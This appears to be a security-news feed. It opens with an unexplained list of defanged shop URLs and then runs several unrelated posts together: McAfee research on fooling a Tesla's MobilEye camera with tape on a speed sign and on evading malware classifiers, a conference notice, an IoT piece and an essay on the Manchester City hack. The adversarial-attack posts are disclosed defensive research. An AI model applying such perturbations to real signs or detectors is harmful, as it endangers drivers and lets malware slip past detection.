URL: http://usacontainergroup.]com/
URL: http://tile.]tilesandiego.]com/
URL: http://bartonwest.]com/
URL: https://www.]dazzstyle.]com/
URL: https://minervamedical.]ca/
URL: http://www.]inflatable-zone.]org/
URL: http://www.]ilovedelfruito.]com/
URL: http://www.]hotsca.]com/
URL: http://www.]uebuys.]com/
URL: http://girlsandpearls.]com/
URL: http://obeikandl.]com/
URL: http://thanhloc1.]com/
URL: http://seasonallivingokc.]com/
URL: https://www.]macroman.]in/
URL: https://www.]petremedies.]co.]uk/
URL: http://www.]hessiansantasacks.]co.]uk/
URL: http://naturagladlife.]com/
URL: http://www.]protezzla-direct.]com/nkc-ledenvoordeel/
URL: https://commercialpoolandspasupplies.]com/
URL: http://www.]sclabrine.]com/
URL: http://www.]quimex.]com.]ar/
URL: http://lojamundodosgames.]com/
URL: http://om10.]ru/
URL: http://www.]webshopsmagento.]nl/
URL: http://www.]suninbox.]co.]uk/
URL: https://www.]vayobv.]com/
URL: http://www.]louboutinuk.]co.]uk/
URL: https://www.]ikonmotorsports.]com/
URL: http://hotelcathedrale.]be/
URL: https://www.]eternis.]pt/
URL: http://www.]arquegym.]com.]br/
URL: http://fetchscripts.]com/
URL: http://petit-univers.]com/
URL: https://www.]krausjeans.]com/
URL: http://store.]uggtasman.]com.]au/
URL: http://ledrus.]co.]nz/
URL: http://obeikandl.]com/
URL: http://hotelcathedrale.]be/
URL: http://net-istore.]ro/
URL: http://www.]mrsflorist.]co.]in/
URL: http://shop-camera.]com/

Save the Date for the 6th Annual NICE K12 Cybersecurity Education Conference

6th ANNUAL NICE K12 Cybersecurity Education Conference SAVE THE DATE: December 7-8, 2020 LOCATION: St. Louis, Missouri Visit the Conference Website We are excited to announce that this year’s NICE K12 Cybersecurity Education Conference will take place on December 7-8, 2020 at the in St. Louis, Missouri. Key upcoming dates: Early April - Call for Proposals July - Early bird registration Keep up to date at the conference website: k12cybersecurityconference.org. This event is supported by the National Initiative for Cybersecurity Education (NICE), a program of the National Institute of Standards

Model Hacking ADAS to Pave Safer Roads for Autonomous Vehicles

The last several years have been fascinating for those of us who have been eagerly observing the steady move towards autonomous driving. While semi-autonomous vehicles have existed for many years, the vision of fleets of fully autonomous vehicles operating as a single connected entity is very much still a thing of the future. However, the latest technical advances in this area bring us a unique and compelling picture of some of the capabilities we might expect to see “down the road.” Pun intended.

For example, nearly every new vehicle produced in 2019 has a model which implements state-of-the art sensors that utilize analytics technologies, such as machine learning or artificial intelligence, and are designed to automate, assist or replace many of the functions humans were formerly responsible for. These can range from rain-sensors on the windshield to control wiper blades, to object detection sensors using radar and lidar for collision avoidance, to camera systems capable of recognizing objects in range and providing direct driving input to the vehicle.

This broad adoption represents a fascinating development in our industry; it’s one of those very rare times when researchers can lead the curve ahead of adversaries in identifying weaknesses in underlying systems.

McAfee Advanced Threat Research (ATR) has a specific goal: identify and illuminate a broad spectrum of threats in today’s complex landscape. With model hacking, the study of how adversaries could target and evade artificial intelligence, we have an incredible opportunity to influence the awareness, understanding and development of more secure technologies before they are implemented in a way that has real value to the adversary.

With this in mind, we decided to focus our efforts on the broadly deployed MobilEye camera system, today utilized across over 40 million vehicles, including Tesla models that implement Hardware Pack 1.

18 Months of Research

McAfee Advanced Threat Research follows a responsible disclosure policy, as stated on our website. As such, we disclosed the findings below to both Tesla and MobilEye 90 days prior to public disclosure. McAfee disclosed the findings to Tesla on September 27th, 2019 and MobilEye on October 3rd, 2019. Both vendors indicated interest and were grateful for the research but have not expressed any current plans to address the issue on the existing platform. MobilEye did indicate that the more recent version(s) of the camera system address these use cases.

MobilEye is one of the leading vendors of Advanced Driver Assist Systems (ADAS) catering to some of the world’s most advanced automotive companies. Tesla, on the other hand, is a name synonymous with ground-breaking innovation, providing the world with the innovative and eco-friendly smart cars.

 

MobilEye camera sensor
A table showing MobilEye’s EyeQ3 being used in Tesla’s hardware pack 1.

As we briefly mention above, McAfee Advanced Threat Research has been studying what we call “Model Hacking,” also known in the industry as adversarial machine learning. Model Hacking is the concept of exploiting weaknesses universally present in machine learning algorithms to achieve adverse results. We do this to identify the upcoming problems in an industry that is evolving technology at a pace that security has not kept up with.

We started our journey into the world of model hacking by replicating industry papers on methods of attacking machine learning image classifier systems used in autonomous vehicles, with a focus on causing misclassifications of traffic signs. We were able to reproduce and significantly expand upon previous research focused on stop signs, including both targeted attacks, which aim for a specific misclassification, as well as untargeted attacks, which don’t prescribe what an image is misclassified as, just that it is misclassified. Ultimately, we were successful in creating extremely efficient digital attacks which could cause misclassifications of a highly robust classifier, built to determine with high precision and accuracy what it is looking at, approaching 100% confidence.

Targeted digital white-box attack on stop sign, causing custom traffic sign classifier to misclassify as 35-mph speed sign

We further expanded our efforts to create physical stickers, shown below, that model the same type of perturbations, or digital changes to the original photo, which trigger weaknesses in the classifier and cause it to misclassify the target image.

Targeted physical white-box attack on stop sign, causing custom traffic sign classifier to misclassify the stop sign as an added lane sign

This set of stickers has been specifically created with the right combination of color, size and location on the target sign to cause a robust webcam-based image classifier to think it is looking at an “Added Lane” sign instead of a stop sign.

Video demo of our resilient classifier in the lab which correctly recognizes the 35-mph speed limit sign, even when it is partially obstructed

In reality, modern vehicles don’t yet rely on stop signs to enable any kind of autonomous features such as applying the brakes, so we decided to alter our approach and shift (pun intended) over to speed limit signs. We knew, for example, that the MobilEye camera is used by some vehicles to determine the speed limit, display it on the heads-up display (HUD), and potentially even feed that speed limit to certain features of the car related to autonomous driving. We’ll come back to that!

We then repeated the stop sign experiments on traffic signs, using a highly robust classifier, and our trusty high-resolution webcam. And just to show how robust our classifier is, we can make many changes to the sign— block it partially, place the stickers in random locations — and the classifier does an outstanding job of correctly predicting the true sign, as demonstrated in the video above. While there were many obstacles to achieving the same success, we were ultimately able to prove both targeted and untargeted attacks, digitally and physically, against speed limit signs. The below images highlight a few of those tests.

Example of targeted digital perturbations printed out using a black and white printer which cause a misclassification of 35-mph speed sign to 45-mph speed sign.

At this point, you might be wondering “what’s so special about tricking a webcam into misclassifying a speed limit sign, outside of just the cool factor?” Not much, really. We felt the same, and decided it was time to test the “black box theory.”

What this means, in its most simple form, is attacks leveraging model hacking which are trained and executed against white box, also known as open source systems, will successfully transfer to black box, or fully closed and proprietary systems, so long as the features and properties of the attack are similar enough. For example, if one system is relying on the specific numeric values of the pixels of an image to classify it, the attack should replicate on another camera system that relies on pixel-based features as well.

The last part of our lab-based testing involved simplifying this attack and applying it to a real-world target. We wondered if the MobilEye camera was as robust as the webcam-based classifier we built in the lab? Would it truly require several highly specific, and easily noticeable stickers to cause a misclassification? Thanks to several friendly office employees, we were able to run repeated tests on a 2016 Model “S” and 2016 Model “X” Tesla using the MobilEye camera (Tesla’s hardware pack 1 with EyeQ3 mobilEye chip). The first test involved simply attempting to recreate the physical sticker test – and, it worked, almost immediately and with a high rate of reproducibility.

In our lab tests, we had developed attacks that were resistant to change in angle, lighting and even reflectivity, knowing this would emulate real-world conditions. While these weren’t perfect, our results were relatively consistent in getting the MobilEye camera to think it was looking at a different speed limit sign than it was. The next step in our testing was to reduce the number of stickers to determine at which point they failed to cause a misclassification. As we began, we realized that the HUD continued to misclassify the speed limit sign. We continued reducing stickers from 4 adversarial stickers in the only locations possible to confuse our webcam, all the way down to a single piece of black electrical tape, approximately 2 inches long, and extending the middle of the 3 on the traffic sign.

A robust, inconspicuous black sticker achieves a misclassification from the Tesla model S, used for Speed Assist when activating TACC (Traffic Aware Cruise Control)

Even to a trained eye, this hardly looks suspicious or malicious, and many who saw it didn’t realize the sign had been altered at all. This tiny piece of sticker was all it took to make the MobilEye camera’s top prediction for the sign to be 85 mph.

 

The finish line was close (last pun…probably).

Finally, we began to investigate whether any of the features of the camera sensor might directly affect any of the mechanical, and even more relevant, autonomous features of the car. After extensive study, we came across a forum referencing the fact that a feature known as Tesla Automatic Cruise Control (TACC) could use speed limit signs as input to set the vehicle speed.

There was majority of consensus among owners that this might be a supported feature. It was clear that there was also confusion among forum members as to whether this capability was possible, so our next step was to verify by consulting Tesla software updates and new feature releases.

A software release for TACC contained just enough information to point us towards speed assist, with the following statement, under the Tesla Automatic Cruise Control feature description.

“You can now immediately adjust your set speed to the speed determined by Speed Assist.”

This took us down our final documentation-searching rabbit hole; Speed Assist, a feature quietly rolled out by Tesla in 2014.

Finally! We can now add these all up to surmise that it might be possible, for Tesla models enabled with Speed Assist (SA) and Tesla Automatic Cruise Control (TACC), to use our simple modification to a traffic sign to cause the car to increase speed on its own!

Despite being confident this was theoretically possible, we decided to simply run some tests to see for ourselves.

McAfee ATR’s lead researcher on the project, Shivangee Trivedi, partnered with another of our vulnerability researchers Mark Bereza, who just so happened to own a Tesla that exhibited all these features. Thanks Mark!

For an exhaustive look at the number of tests, conditions, and equipment used to replicate and verify misclassification on this target, we have published our test matrix here.

The ultimate finding here is that we were able to achieve the original goal. By making a tiny sticker-based modification to our speed limit sign, we were able to cause a targeted misclassification of the MobilEye camera on a Tesla and use it to cause the vehicle to autonomously speed up to 85 mph when reading a 35-mph sign. For safety reasons, the video demonstration shows the speed start to spike and TACC accelerate on its way to 85, but given our test conditions, we apply the brakes well before it reaches target speed. It is worth noting that this is seemingly only possible on the first implementation of TACC when the driver double taps the lever, engaging TACC. If the misclassification is successful, the autopilot engages 100% of the time. This quick demo video shows all these concepts coming together.

Of note is that all these findings were tested against earlier versions (Tesla hardware pack 1, mobilEye version EyeQ3) of the MobilEye camera platform. We did get access to a 2020 vehicle implementing the latest version of the MobilEye camera and were pleased to see it did not appear to be susceptible to this attack vector or misclassification, though our testing was very limited. We’re thrilled to see that MobilEye appears to have embraced the community of researchers working to solve this issue and are working to improve the resilience of their product. Still, it will be quite some time before the latest MobilEye camera platform is widely deployed. The vulnerable version of the camera continues to account for a sizeable installation base among Tesla vehicles. The newest models of Tesla vehicles do not implement MobilEye technology any longer, and do not currently appear to support traffic sign recognition at all.

Looking Forward

We feel it is important to close this blog with a reality check. Is there a feasible scenario where an adversary could leverage this type of an attack to cause harm? Yes, but in reality, this work is highly academic at this time. Still, it represents some of the most important work we as an industry can focus on to get ahead of the problem. If vendors and researchers can work together to identify and solve these problems in advance, it would truly be an incredible win for us all. We’ll leave you with this:

In order to drive success in this key industry and shift the perception that machine learning systems are secure, we need to accelerate discussions and awareness of the problems and steer the direction and development of next-generation technologies. Puns intended.

 

The post Model Hacking ADAS to Pave Safer Roads for Autonomous Vehicles appeared first on McAfee Blogs.

Introduction and Application of Model Hacking

Catherine Huang, Ph.D., and Shivangee Trivedi contributed to this blog.

The term “Adversarial Machine Learning” (AML) is a mouthful!  The term describes a research field regarding the study and design of adversarial attacks targeting Artificial Intelligence (AI) models and features.  Even this simple definition can send the most knowledgeable security practitioner running!  We’ve coined the easier term “model hacking” to enhance the reader’s comprehension of this increasing threat.  In this blog, we will decipher this very important topic and provide examples of the real-world implications, including findings stemming from the combined efforts of McAfee’s Advanced Analytic Team (AAT) and Advanced Threat Research (ATR) for a critical threat in autonomous driving.

  1. First, the Basics

AI is interpreted by most markets to include Machine Learning (ML), Deep Learning (DL), and actual AI, and we will succumb to using this general term of AI here.  Within AI, the model – a mathematical algorithm that provides insights to enable business results – can be attacked without knowledge of the actual model created.  Features are those characteristics of a model that define the output desired.  Features can also be attacked without knowledge of the features used!  What we have just described is known as a “black box” attack in AML – not knowing the model and features – or “model hacking.”  Models and/or features can be known or unknown, increasing false positives or negatives, without security awareness unless these vulnerabilities are monitored and ultimately protected and corrected.

In the feedback learning loop of AI, recurrent training of the model occurs in order to comprehend new threats and keep the model current (see Figure 1).  With model hacking, the attacker can poison the Training Set.  However, the Test Set can also be hacked, causing false negatives to increase, evading the model’s intent and misclassifying a model’s decision.  Simply by perturbating – changing the magnitudes of a few features (such as pixels for images), zeros to ones/ones to zeros, or removing a few features – the attacker can wreak havoc in security operations with disastrous effects.  Hackers will continue to “ping” unobtrusively until they are rewarded with nefarious outcomes – and they don’t even have to attack with the same model that we are using initially!

Figure 1. The continuous feedback loop of AI learning.
  1. Digital Attacks of Images and Malware

Hackers’ goals can be targeted (specific features and one specific error class) or non-targeted (indiscriminate classifiers and more than one specific error class), digital (e.g., images, audio) or physical (e.g., speed limit sign).  Figure 2 shows a rockhopper penguin targeted digitally.  A white-box evasion example (we knew the model and the features), a few pixel changes and the poor penguin in now classified as a frying pan or a computer with excellent accuracy.

Figure 2. An evasion example of a white-box, targeted, and digital attack resulting in the penguin being detected as a desktop computer (85.54%) or a frying pan (93.07%) following pixel perturbations.

While most current model hacking research focuses on image recognition, we have investigated evasion attacks and mitigation methods for malware detection and static analysis.  We utilized DREBIN[1], an Android malware dataset, and replicated the results of Grosse, et al., 2016[2].  Utilizing 625 malware samples highlighting FakeInstaller, and 120k benign samples and 5.5K malware, we developed a four-layer deep neural network with about 1.5K features (see Figure 3).  However, following an evasion attack with only modifying less than 10 features, the malware evaded the neural net nearly 100%.  This, of course, is a concern to all of us.

 

Figure 3. Metrics of the malware dataset and sample sizes.

 

 

Using the CleverHans[1] open-source library’s Jacobian Saliency Map Approach (JSMA) algorithm, we generated perturbations creating adversarial examples.  Adversarial examples are inputs to ML models that an attacker has intentionally designed to cause the model to make a mistake[1].  The JSMA algorithm needs only a minimum number of features need to be modified.  Figure 4 demonstrates the original malware sample (detected as malware with 91% confidence).  After adding just two API calls in a white-box attack, the adversarial example is now detected with 100% confidence as benign. Obviously, that can be catastrophic!

Figure 4. Perturbations added to malware in the feature space resulting in a benign detection with 100% confidence.

 

In 2016, Papernot[5] demonstrated that an attacker doesn’t need to know the exact model that is utilized in detecting malware.  Demonstrating this theory of transferability in Figure 5, the attacker constructed a source (or substitute) model of a K-Nearest Neighbor (KNN) algorithm, creating adversarial examples, which targeted a Support Vector Machine (SVM) algorithm.  It resulted in an 82.16% success rate, ultimately proving that substitution and transferability of one model to another allows black-box attacks to be, not only possible, but highly successful.

Figure 5. Papernot’s 5 successful transferability of adversarial examples created from one model (K Nearest Neighbor or KNN) to attack another model (Support Vector Machine or SVM).

 

In a black-box attack, the DREBIN Android malware dataset was detected 92% as malware.  However, using a substitute model and transferring the adversarial examples to the victim (i.e., source) system, we were able to reduce the detection of the malware to nearly zero.  Another catastrophic example!

Figure 6. Demonstration of a black-box attack of DREBIN malware.
  1. Physical Attack of Traffic Signs

While malware represents the most common artifact deployed by cybercriminals to attack victims, numerous other targets exist that pose equal or perhaps even greater threats. Over the last 18 months, we have studied what has increasingly become an industry research trend: digital and physical attacks on traffic signs. Research in this area dates back several years and has since been replicated and enhanced in numerous publications. We initially set out to reproduce one of the original papers on the topic, and built a highly robust classifier, using an RGB (Red Green Blue) webcam to classify stop signs from the LISA[6] traffic sign data set. The model performed exceptionally well, handling lighting, viewing angles, and sign obstruction. Over a period of several months, we developed model hacking code to cause both untargeted and targeted attacks on the sign, in both the digital and physical realms. Following on this success, we extended the attack vector to speed limit signs, recognizing that modern vehicles increasingly implement camera-based speed limit sign detection, not just as input to the Heads-Up-Display (HUD) on the vehicle, but in some cases, as input to the actual driving policy of the vehicle. Ultimately, we discovered that minuscule modifications to speed limit signs could allow an attacker to influence the autonomous driving features of the vehicle, controlling the speed of the adaptive cruise control! For more detail on this research, please refer to our extensive blog post on the topic.

  1. Detecting and Protecting Against Model Hacking

The good news is that much like classic software vulnerabilities, model hacking is possible to defend against, and the industry is taking advantage of this rare opportunity to address the threat before it becomes of real value to the adversary. Detecting and protecting against model hacking continues to develop with many articles published weekly.

Detection methods include ensuring that all software patches have been installed, closely monitoring drift of False Positives and False Negatives, noting cause and effect of having to change thresholds, retraining frequently, and auditing decay in the field (i.e., model reliability).  Explainable AI (“XAI”) is being examined in the research field for answering “why did this NN make the decision it did?” but can also be applied to small changes in prioritized features to assess potential model hacking.  In addition, human-machine teaming is critical to ensure that machines are not working autonomously and have oversight from humans-in-the-loop.  Machines currently do not understand context; however, humans do and can consider all possible root causes and mitigations of a nearly imperceptible shift in metrics.

Protection methods commonly employed include many analytic solutions: Feature Squeezing and Reduction, Distillation, adding noise, Multiple Classifier System, Reject on Negative Impact (RONI), and many others, including combinatorial solutions.  There are pros and cons of each method, and the reader is encouraged to consider their specific ecosystem and security metrics to select the appropriate method.

  1. Model Hacking Threats and Ongoing Research

While there has been no documented report of model hacking in the wild yet, it is notable to see the increase of research over the past few years: from less than 50 literature articles in 2014 to over 1500 in 2020.  And it would be ignorant of us to assume that sophisticated hackers aren’t reading this literature.  It is also notable that, perhaps for the first time in cybersecurity, a body of researchers have proactively developed the attack, detection, and protection against these unique vulnerabilities.

We will continue to add to the greater body of knowledge of model hacking attacks as well as ensure the solutions we implement have built-in detection and protection.  Our research excels in targeting the latest algorithms, such as GANS (Generative Adversarial Networks) in malware detection, facial recognition, and image libraries.  We are also in process of transferring traffic sign model hacking to further real-world examples.

Lastly, we believe McAfee leads the security industry in this critical area. One aspect that sets McAfee apart is the unique relationship and cross-team collaboration between ATR and AAT. Each leverages its unique skillsets; ATR with in-depth and leading-edge security research capabilities, and AAT, through its world-class data analytics and artificial intelligence expertise. When combined, these teams are able to do something few can; predict, research, analyze and defend against threats in an emerging attack vector with unique components, before malicious actors have even begun to understand or weaponize the threat.

For further reading, please see any of the references cited, or “Introduction to Adversarial Machine Learning” at https://mascherari.press/introduction-to-adversarial-machine-learning/

 

 

[1] Courtesy of Technische Universitat Braunschweig.

[2] Grosse, Kathrin, Nicolas Papernot, et al. ”Adversarial Perturbations Against Deep Neural Networks for Malware Classification” Cornell University Library. 16 Jun 2016.

[3] Cleverhans: An adversarial example library for constructing attacks, building defenses, and benchmarking both located at https://github.com/tensorflow/cleverhans.

[4] Goodfellow, Ian, et al. “Generative Adversarial Nets” https://papers.nips.cc/paper/5423-generative-adversarial-nets.pdf.

[5] Papernot, Nicholas, et al. “Transferability in Machine Learning: from Phenomena to Black-Box Attacks using Adversarial Samples”  https://arxiv.org/abs/1605.07277.

[6] LISA = Laboratory for Intelligent and Safe Automobiles

The post Introduction and Application of Model Hacking appeared first on McAfee Blogs.

Consumers want a fully connected life – but at what cost?

Convenience has always, and will always be king. That’s why it’s no surprise that the average person is collecting connected devices left and right and is expected to own 15 connected devices by 2030. While they vary from person to person, recent research shows that the most popular connected devices tend to be smart meters, speakers, activity trackers, and TVs. That said, customers are curious and are keen to go even further, adopting the latest and greatest when it comes connectivity. This could mean anything from a connected toaster, washing machine or garage, but for many, the connected car is the ultimate toy.

The consumer appeal behind device adoption is understandable – they’re entertaining and they make menial, everyday tasks easier to accomplish. A recent study on connected devices by TechUK found that 42% of consumers agree that both qualities are key drivers in their adoption – a similar finding seen in North America and across Europe. This is a huge shift in sentiment from years before when most consumers considered connected devices to be too complex and costly to be worthy of purchasing.

More 5G, more problems? 

As the demand for continuous connectivity grows, 5G will completely reshape the way consumers interact with the world around them. However, with more devices coming into homes, concerns around the way personal data and information is managed, controlled and used by organizations are starting to come into question.

Recent research shows that many consumer worries are specifically based on safety and security related to products being unreliable, data breaches, as well as a lack of trust in smart technology manufacturers. In short, this shows worryingly low levels of trust for suppliers and a lack of knowledge about what fail-safes solutions are in place in case of emergency.

These concerns aren’t unwarranted. Over the past few years, consumers have been witness to some of the worst data breaches and cyber-attacks in history, and many have had a front seat to the growing number of IoT attacks taking hold of homes across the globe. These aren’t our parents’ attackers – today’s cybercriminals are savvy, smart and are fully aware of the lack of adequate security controls on many of these devices, leaving them in a perfect position to cause chaos.

Unfortunately, they’re doing a great job so far. Recent figures show that the total number of IoT malware samples grew 154% over the last year and just recently, McAfee Advanced Threat Research discovered a vulnerability in the Chamberlain MyQ Hub, a garage door automation platform, as well as an insecure design in the McLear NFC Ring that could allow an attacker to easily clone the ring and gain entry to a consumer home.

Next-generation concerns    

There’s no debate that analytics are key to making every day technology smarter, faster and more efficient. They’re integral to the evolution of artificial intelligence (AI), reinforcement learning (RL) and robotic process automation (RPA) as well as cutting-edge consumer technologies like the connected car.

Nearly every modern vehicle uses state-of-the-art sensors that use analytics technologies like AI and ML. These technologies are specifically designed to automate many of the functions that humans would traditionally have done. These can include – but are not limited to – rain-sensors on the windshield to control wiper blades and sensors which detect objects to help avoid collisions.

As these technologies are central to the functionality of autonomous vehicles, researching potential weaknesses in the underlying systems has been key. To do this, the McAfee Advanced Threat Research Team (ATR) and the Advanced Analytics Team (AAT) recently came together to study how AI models within autonomous vehicles could be targeted by adversaries – a process now referred to as “Model Hacking”. To fully understand the potential for threat, the teams focused their efforts on the broadly deployed MobilEye camera system, which is currently used in over 40 million vehicles, including one of the leading connected car manufacturers. Through their research they successfully created a black-box targeted attack, causing the camera to misclassify a 35 mile-per-hour (mph) speed limit sign as 85 mph. This resulted in the vehicle increasing its speed to 85 mph on its own.

While it’s currently unlikely that this type of attack would be used to do harm, being able to get ahead of the problem and understand where potential risks lie is vital. It is also important that industry leaders work together to shift perception that machine learning and AI systems are automatically secure in order to drive success in autonomous driving. This means opening up the discussion and raising awareness of the problems and pitfalls to steer the direction and development of safer next-generation technologies.

 

Taking security into their own hands

Despite the valid concerns around safety, security and information management, the rollout of 5G will only continue to encourage the use of smarter and more efficient IoT devices. But how can consumers fully enjoy the benefits of these new technologies when the most malicious actors continue to evolve and exploit the existing – and arguably – sometimes lackluster security controls in place? Get in control! Consumers must take a stand to safeguard their homes from within and start asking the question – is this device secure?

Running point on your online security may seem overwhelming at first, but it’s possible to both reap the benefits of your connected devices while staying safe – here’s how:

  • Practice proper online security habits: The silver lining of all this security chaos is that there are now countless ‘best practices’ consumers can quickly adopt. These include implementing a strong password policy, putting IoT devices on their own, separate network, and utilizing a dual-factor authentication when possible.
  • Do your research: Before purchasing a new IoT device, take the time to look into its security features and understand the security risks associated. Ensure you have the industry knowledge to make sure you’re buying the safest tools available on the market.
  • Buy through trusted advisors. Some brands have your best interests in mind and unfortunately, some don’t. Being able to identify which ones do can make the difference between being a victim or not.
  • Act: While the accuracy and agility of intelligent systems offers convenience, don’t assume any sort of hiccup is just a fluke. If something seems off with the technology, raise the issue to the manufacturer.
  • Always update: Part of the convenience of connected technologies is they have the ability to update remotely—when one of these such updates is offered by the manufacturer, make sure to take the time to do so as soon as possible.

Of course, the onus does not fully fall solely on the consumer. Brands must do their part in ensuring the supply chain is secure and that consumers’ online lives are fully protected from end-to-end. Doing this starts with designing IoT devices with security in mind. IoT manufacturers must embed security into the architecture, interfaces, and designs of their products. They must ensure device identity and authentication are a part of the provision and configuration process and must work with consumers to empower them to apply proper administration and management throughout the lifecycle of their device.

From 5G and autonomous cars to smart cities and AI, the next few years will no doubt be a transformative time for technology. Though for organizations and consumers to get the full benefits from these technologies, the industry must work together to eliminate risks from the inside out. Sharing the responsibility of safety will be a crucial part in tackling the insidious threats facing us today. It will ensure consumers all across the world will be able to stay connected and live an increasingly digital, convenient and efficient life.

The post Consumers want a fully connected life – but at what cost? appeared first on McAfee Blogs.

The Billion Pound Manchester City Hack

The sport of football is a multi-billion-pound global industry, where the world's top-drawer football clubs push competitive advantages to the extreme, not just for the prestige of winning trophies, as success on the pitch also means a greater slice of jaw-dropping TV, sponsorship and advertising revenues. 

The key commodity in the football industry are football players, elite talent players command transfer fees up to 100 times their weight in gold and receive millions a year in wages.  Investing in recruiting the best football players increases the likelihood of winning matches, titles and lucrative financial rewards. The competition for success is especially fierce between Europe's largest football clubs. This is leading to ever-inflating player transfer fees and wages, rippling downwards throughout football's global pyramid of leagues, with many clubs gambling with financial outlays on recruiting player talent, in hope of achieving the financial rewards which success on the football pitch brings.

Top Ten Football Club Revenues in 2018-19 (change from 2017-18)
1 Barcelona                 £741.1m (+£129.5m)
2 Real Madrid             £667.5m (+£2m)
3 Manchester United £627.1m (+£37.3m)
4 Bayern Munich £581.8m (+£24.4m)
5 Paris St-Germain £560.5m (+£80.6m)
6 Manchester City £538.2m (+£34.7m)
7 Liverpool                 £533m    (+£77.9m)
8 Tottenham               £459.3m (+£79.9m)
9 Chelsea                  £452.2m (-£4.2m)
10 Juventus                £405.2m (-£55.7m)
Source: Deloitte Football Money League

The Deloitte Football Money League illustrates the scale and growth in revenues at Europe's top tier clubs. Most of this revenue is acquired through participation in the UEFA Champions League (up to £150m), club sponsorship deals, and national league TV deals, especially the English Premier League, where clubs finishing in the top six positions are given around £150m a year. The number of bums on seats at stadia doesn't have the financial impact on a club's revenue stream as it once did. Success on the pitch is the greatest driver of a club's revenue, the new model of sustained success in football is recruiting and retaining the best squad of football players.

Such high stakes and large financial numbers are a recipe for pushing and bending football's rules, Real Madrid, Barcelona, Atletico Madrid, Liverpool, Chelsea and Manchester City have all been disciplined for breaking youth player recruitment rules. Football's rules are written and enforced by football’s various governing bodies, starting with country-level governance such as the English Premier League and The English Football Association (The FA), continental level governance such as Union of European Football Associations (UEFA) and finally the global football authority which is Fédération Internationale de Football Association (FIFA).

The Million Manchester City Pound Hack
As football players are the key elements of achieving success, most top tier clubs invest heavily to build intelligence on the best players to recruit. Clubs operate scouting networks on a global scale, utilising applications to gather and record statistical player data, and employ expert analysts to crunch those stats. All to determine which players they should target to improve their squad, when they should attempt to buy, and how much they should spend to achieve a maximum return on their investment.
Manchester City have a rocky relationship with UEFA

The top two rivals competing for success in the English Premier League in recent years have been Manchester City and Liverpool football clubs, with both clubs winning several major titles. At the end of 2011/12 season, it was a different story, Manchester City had won the Premier League title while Liverpool finished in 8th position, outside of lucrative Champions League qualification and 47 points behind City.  At the end of this season, Liverpool 'poached' two of Manchester City's scouting and recruitment leads, Dave Fallows and Barry Hunter, as their head of scouting and chief scout respectively.  14 months after these appointments were made, Liverpool paid Manchester City £1 million as part of a confidential settlement after it was alleged City’s cloud-based scouting application, Opta's Scout7, had been accessed by Liverpool FC staff on hundreds of occasions.  Whether this breach was 'assisted' by Manchester City not removing ex-employee access to their Scout7 app, or involved the hacking of City's accounts remains undisclosed.
Player Scouting App Scout7

The Premier League were not informed about this incident and the settlement until September 2019, when they launched an investigation, but confirmed on 7th February 2020 it would not be bringing any charges.  An FA spokesperson said: “The FA carefully considered the evidence received in this matter, including information provided by both clubs involved, and has decided not to progress the investigation. This is due to a number of factors including the age of the alleged concerns and the settlement agreed by the two clubs involved.  As per standard protocol, should the FA receive further information or evidence, the decision not to progress the investigation may be reviewed.” 

Since the hack there has been a major resurgence with Liverpool's success on the pitch, under their current manager Liverpool have spent £400 million on recruiting new players, creating arguably one of the strongest squads they have ever had. A squad which won the Champions League last season, while this season Liverpool stands to win the Premier League title for the first time in their history by some distance. The role of this alleged City hack in Liverpool's recent rise to the top can never be understood, a coincidence or not, most football pundits agree Liverpool's player recruitment in recent years has been first class.

As of 25th May 2018 such hacked data breaches are required to be disclosed to the UK's Information Commissioner's Office (ICO), and could theoretically cost Manchester City and perhaps Liverpool millions in fines under the recently updated UK Data Protection Act, which incorporates the European General Data Protection Regulation (GDPR). Given the Scout7 app holds the personal data of European players, and  GDPR fines can be up to 4% of global turnover, this means a potential ICO fine of up £20 million. And accessing or hacking into systems without permission is a criminal offence under the UK Computer Misuse Act.

The Billion Pound Manchester City Hack
On 14th February, UEFA's Chamber of the Club Financial Control Body (CFCB) announced its decision to ban Manchester City from competing in European competition for two years, and a £25 million fine for breaching UEFA’s Financial Fair Play (FFP) rules.  



The revenue from missing two Champions League campaigns could cost the Manchester club around £300 million in total. The Premier League and the English FA are also investigating City on the back of the UEFA investigation, so could follow suit with their own FFP sanctions, with media speculating such investigations could result in City's relegation to England's bottom tier of professional football. Dropping to League Two could potentially cost the club around £1 billion in lost TV revenues alone.  However, Man.City quickly announced they will be challenging UEFA’s findings and disciplinary action through the Court of Arbitration for Sport (CAS), so it remains to be seen if those UEFA disciplinary sanctions will stand. City’s FFP woes all started with a hack of their email system, a hack which could ultimately cost the club over billion pounds.

Is Football 'Wikileaks' Ethical?
UEFA's investigation into City started with the club's hacked internal emails being disclosed to the media, by a hacker through a 'football leaks' website. On 5th November 2018, German magazine ‘Der Spiegel’ (The Mirror) published an article which claimed City and their sponsors had manipulated sponsorship contracts to circumvent UEFA FFP rules, inflating the value of their commercial income. The Spiegel article supported claims of FFP ‘wrongdoing’ by quoting extracts from senior Manchester City club officials stolen internal emails.

Portuguese resident Rui Pinto is alleged to be the hacker who successfully hacked into City's internal email system in 2015. Pinto was arrested and remains in prison awaiting trial on 90 different counts of hacking, sabotage and fraud. Pinto reportedly took 70 million documents and 3.4 terabytes of information from a string of football clubs and high profile players, releasing the data via the 'football leaks' website (https://footballleaks2015.wordpress.com/).  

Pinto told Der Spiegel he was aware of the risks of his work and is quoted as saying “I initiated a spontaneous movement of revelations about the football industry.  So depending on your viewpoint, and likely your football club loyalty, this 'Wikileaks for football' is either ethical on transparency grounds, or it should not be condoned given the information was obtained by illegal means.  Just like the actual Wikileaks, individual views will be polarised on the ethics of leaking private and confidential information into the public domain. Although given the tribal and competitive nature of most football fans, aside from Manchester City fans, most football fans are likely to agree the illegal method was justified.  


Rui Pinto, Criminal Hacker or Whistleblower?

It seems UEFA also agree with the illegal method used, as on the back of the Der Spiegel article and hacked emails, UEFA began its investigation into Manchester City on March 2019, stating “The investigation will focus on several alleged violations of FFP that were recently made public in various media outlets."  

The 'Ethical' Legal Battle Ahead
When police authorities and prosecutors do not collect evidence using legal means in criminal trials, such evidence becomes inadmissible in court. Digital evidence not forensically acquired can also be challenged and dismissed. Hacked emails as text files can be easily doctored. For instance, in 2018 said key documents supporting rape claims against Cristiano Ronaldo, as obtained through the Football Leaks website, were subsequently dismissed by Ronaldo's lawyers as having been fabricated by hackers.

If all the other top tier football clubs had all their internal emails disclosed to the media and UEFA investigators, how many other clubs would be found to have bent or broken FFP rules as well?  There are many football fans deeply suspicious about the finances and commercial sponsorship deals at many of Europe’s elite football clubs.

